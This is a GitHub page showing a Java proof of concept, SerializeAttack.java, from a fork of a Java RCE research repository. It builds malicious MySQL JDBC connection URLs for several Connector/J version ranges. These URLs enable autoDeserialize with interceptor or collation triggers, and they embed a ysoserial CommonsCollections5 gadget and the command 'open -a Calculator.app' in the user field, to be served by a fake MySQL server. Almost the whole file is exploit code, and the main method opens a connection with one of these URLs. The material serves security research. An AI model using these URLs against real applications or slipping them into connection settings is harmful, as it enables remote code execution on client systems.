forked from Whoopsunix/JavaRce
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathSerializeAttack.java
More file actions
68 lines (55 loc) · 2.79 KB
/
SerializeAttack.java
File metadata and controls
68 lines (55 loc) · 2.79 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
package mysql;
import java.sql.Connection;
import java.sql.DriverManager;
/**
* 反序列化
* mysql https://mvnrepository.com/artifact/mysql/mysql-connector-java
* 复现使用 https://github.com/fnmsd/MySQL_Fake_Server
*
* @author Whoopsunix
*/
public class SerializeAttack {
public static void main(String[] args) throws Exception {
/**
* [5.1.1, 5.1.10]
* 使用 statementInterceptors 参数
* 需要通过 查询调用
*/
// String serializeAttackURL_5_1_10 = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_open -a Calculator.app";
// String username = "yso_CommonsCollections5_open -a Calculator.app";
// String password = "";
// Class.forName("com.mysql.jdbc.Driver");
// Connection con = DriverManager.getConnection(serializeAttackURL_5_1_10, username, password);
// String sql = "select database()";
// PreparedStatement ps = con.prepareStatement(sql);
// ResultSet resultSet = ps.executeQuery();
/**
* [5.1.11, 5.1.48]
* 使用 statementInterceptors 参数
*/
String serializeAttackURL_5_11_48 = "jdbc:mysql://127.0.0.1:3306/test?maxAllowedPacket=655360&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_open -a Calculator.app";
/**
* [5.1.19, 5.1.28]
*/
String serializeAttackURL_5_19_28 = "jdbc:mysql://127.0.0.1:3306/test?maxAllowedPacket=655360&autoDeserialize=true&user=yso_CommonsCollections5_open -a Calculator.app";
/**
* [5.1.29, 5.1.40]
* detectCustomCollations 触发
*/
String serializeAttackURL_5_29_40 = "jdbc:mysql://127.0.0.1:3306/test?maxAllowedPacket=655360&detectCustomCollations=true&autoDeserialize=true&user=yso_CommonsCollections5_open -a Calculator.app";
/**
* [6.0.2, 6.0.6]
* statementInterceptors
*/
String serializeAttackURL_6 = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_open -a Calculator.app";
/**
* [8.0.7-dmr,8.0.19]
* statementInterceptors
*/
String serializeAttackURL_8_7_19 = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_open -a Calculator.app";
// 低版本需要加载
String driver = "com.mysql.jdbc.Driver";
Class.forName(driver);
Connection connection = DriverManager.getConnection(serializeAttackURL_8_7_19);
}
}